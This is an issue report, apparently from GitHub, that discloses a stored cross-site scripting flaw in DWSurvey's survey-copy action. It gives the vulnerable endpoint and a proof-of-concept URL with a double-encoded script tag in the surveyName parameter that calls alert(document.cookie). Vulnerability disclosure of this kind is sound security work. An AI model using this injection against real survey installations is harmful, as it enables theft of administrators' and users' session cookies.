DWSurvey [security vulnerability]stored xss when copy the survey

[security vulnerability]stored xss when copy the survey

Open cctv0x01 opened this issue 5 years ago • 0 comments

There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or stole admin's or other users cookies when copy the survey

Vulnerability file: /design/my-survey-design!copySurvey.action

PoC: /design/my-survey-design!copySurvey.action?surveyName=A%2520test%25EF%25BC%258Dcopy%2522%252F%253E%253Cscript%253Ealert%28document.cookie%29%253C%252Fscript%253E

Aug 07 '19 04:08 cctv0x01

DWSurvey DWSurvey copied to clipboard

[security vulnerability]stored xss when copy the survey

DWSurvey
DWSurvey copied to clipboard